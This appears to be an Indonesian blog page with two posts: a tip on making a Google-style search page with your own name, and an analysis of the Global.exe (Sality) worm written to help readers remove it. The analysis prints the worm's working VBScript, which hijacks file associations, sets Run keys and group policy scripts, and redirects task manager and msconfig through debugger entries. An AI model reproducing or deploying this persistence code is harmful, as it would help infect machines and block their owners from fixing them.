Selasa, 06 Januari 2009

5 Langkah Mengganti Logo Google dengan Nama Anda

Siapa yang tak kenal dengan Google, mesin cari populer dengan latar halaman bernuansa putih sederhana plus logo “Google” di atas kotak mesin carinya.

Jika Anda bosan dengan tampilan logo tersebut, Anda bisa membuat halaman seperti Google dengan nama Anda. Caranya sangat mudah. Cukup klik-klik saja logo dan style yang diinginkan, dalam sekejap Anda akan bisa memiliki halaman mesin cari seperti Google dengan nama Anda. Simak langkahnya:

1. Buka situs http://www.funnylogo.info/create.asp
2. Masukan nama yang Anda inginkan pada situs tersebut.Seperti Contoh:Erlan Googl3. Tentukan style tulisan yang diinginkan, misal: Google Style.
4. Klik “Create My Search Engine”.
5. Setelah itu akan muncul tampilan “Situs Google” dengan logo yang kita inginkan.

Untuk membuat tampilan tersebut menjadi halaman default ketika Anda membuka browser, copy alamat yang tertera pada Address.

Untuk Browser Internet Explorer (IE):
1. Klik menu Tools - Internet Options
2. Pilih tab General, lalu ubah field Home Page dengan alamat tersebut.

Untuk Browser Mozila:
1. Klik menu Tools - Options
2. Pilih tab Main, lalu ubah field Home Page dengan alamat tersebut.
3. Pada field When Firefox starts, pilih settingan Show my home page, lalu klik OK.

Setelah semua langkah dilakukan, Anda bisa mencoba membuka browser dan melihat hasilnya.
Tidak ada komentar:

Senin, 05 Januari 2009

Menghapus Virus Global.exe

Hasil Analisa Saya sewaktu melihat Virus tersebut

Nama Malware : Global.Worm [Morphost], virus.Win32.Sality.z [KasperskyLab], W32.Silly.FDC [Symantec], W32/Sality.ag [McAfee]

Ukuran : 286,720 bytes

Pengirim Virus : ditemukan oleh metode Heuristik Morphost

Icon : icon folder

CRC32 : 55BC6B01 (berdasarkan file yang ditemukan)

MD5 : 67CE8B53CBF5A1D3BF4269748F82ACCA (berdasarkan file yang ditemukan)

Dibuat dengan : Visual Basic


Direktori projek saat pembuatan virus ini adalah:

C:\Documents and Settings\TASDA.TASDA-B20F43BAE\Desktop07\Project1.vbp


Ditemukan script vbs seperti berikut:

dim fs,rg

set fs = createobject("scripting.filesystemobject")

set rg = createobject("wscript.shell")

on error resume next

rg.regwrite "HKCR\.vbs\", "VBSFile"

rg.regwrite "HKCU\Control Panel\Desktop\SCRNSAVE.EXE", " C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com"

rg.regwrite "HKCU\Control Panel\Desktop\ScreenSaveTimeOut", "30"

rg.regwrite "HKCR\MSCFile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"

rg.regwrite "HKCR\regfile\Shell\Open\Command\", "C:\WINDOWS\pchealth\Global.exe"

rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"

rg.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\", "C:\WINDOWS\system32\dllcache\Default.exe"

rg.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\", "C:\WINDOWS\system\KEYBOARD.exe"

rg.regwrite "HKEY_CLASSES_ROOT\MSCFile\Shell\Open\Command\", "C:\WINDOWS\Fonts\Fonts.exe"


rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\DisplayName","Local Group Policy"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\FileSysPath",""

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPO-ID","LocalGPO"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\GPOName","Local Group Policy"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\SOM-ID","Local"

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Parameters",""

rg.regwrite "HKCU\Software\Policies\Microsoft\Windows\System\Scripts\Logoff\Script","C:\WINDOWS\Cursors\Boom.vbs"


rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\DisplayName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\FileSysPath", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPO-ID", "LocalGPO"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\GPOName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\SOM-ID", "Local"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Parameters", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Shutdown\Script", "C:\WINDOWS\Cursors\Boom.vbs"


rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\DisplayName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\FileSysPath", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPO-ID", "LocalGPO"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\GPOName", "Local Group Policy"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\SOM-ID", "Local"

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Parameters", ""

rg.regwrite "HKLM\Software\Policies\Microsoft\Windows\System\Scripts\Startup\Script", "C:\WINDOWS\Cursors\Boom.vbs"


If Not fs.fileexists("C:\WINDOWS\Fonts\Fonts.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\Fonts\Fonts.exe")

If Not fs.fileexists("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\helpctr\binaries\HelpHost.com")

If Not fs.fileexists("C:\WINDOWS\pchealth\Global.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\pchealth\Global.exe")

If Not fs.fileexists("C:\WINDOWS\system\KEYBOARD.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system\KEYBOARD.exe")

If Not fs.fileexists("C:\WINDOWS\system32\dllcache\Default.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\WINDOWS\system32\dllcache\Default.exe")

If Not fs.fileexists("C:\windows\system32\drivers\drivers.cab.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\system32\drivers\drivers.cab.exe ")

If Not fs.fileexists("C:\windows\media\rndll32.pif ") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\media\rndll32.pif")

If Not fs.fileexists("C:\windows\fonts\tskmgr.exe") Then fs.copyfile ("C:\WINDOWS\Help\microsoft.hlp"), ("C:\windows\fonts\tskmgr.exe")




Membuat File di:

“C:\windows\system32\dllchace\autorun.inf”

“C;\windows\Cursors\Boom.vbs”

Dan lain-lain



Membuat registry key berikut:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\comfile]

NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\exefile]

NeverShowExt = "1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system]

DisableStatusMessages = 0x00000001

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]

sys = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

(Default) = "%Windir%\system\KEYBOARD.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = "%System%\dllcache\Default.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\auto.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autorun.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\autoruns.exe]

Debugger = "%System%\drivers\drivers.cab.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\boot.exe]

Debugger = "%FontsDir%\fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ctfmon.exe]

Debugger = "%FontsDir%\Fonts.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe]

Debugger = "%Windir%\Media\rndll32.pif"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe]

* Debugger = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskmgr.exe]

Debugger = "%FontsDir%\tskmgr.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Shutdown]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"

[HKEY_CURRENT_USER\Control Panel\Desktop]

SCRNSAVE.EXE = "%Windir%\pchealth\helpctr\binaries\HelpHost.com"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]

(Default) = "%System%\dllcache\Default.exe"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

Parameters = ""

Script = "%Windir%\Cursors\Boom.vbs"

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System\Scripts\Logoff]

DisplayName = "Local Group Policy"

FileSysPath = ""

GPO-ID = "LocalGPO"

GPOName = "Local Group Policy"

SOM-ID = "Local"



Menghapus registry:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\MSCFile\Shell\Open\Command]

(Default) = "%SystemRoot%\system32\mmc.exe "%1" %*"




Memodifikasi registry value:

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command]

(Default) = "%Windir%\pchealth\Global.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\SuperHidden]

ValueName = "ShowSuperHiden"

[HKEY_CURRENT_USER\Control Panel\Desktop]

AutoEndTasks = "1"

ScreenSaveTimeOut = "30"



=============================================================================


Untuk worm ini sudah bisa dibereskan dengan Morphost Antivirus. [NB: Sekarang Morphost udah diperbaharui, jadi silakan download Morphost yang baru.]

Signature worm ini sudah saya masukkan ke dalam database Morphost. Jadi kamu sudah bisa menggunakan Morphost untuk menscan Komputermu dari Global.Worm.

Kalo Global.Worm belum juga pergi dari komputermu. Lakukan langkah berikut:

-Pilih tab settings

-Pilih options ”let users make their database themselves” pada frames “database”

-Lalu masukkan satu saja sampel Global.Worm

-Dan langsung scan!
Tidak ada komentar:
Label:
Langganan: Postingan (Atom)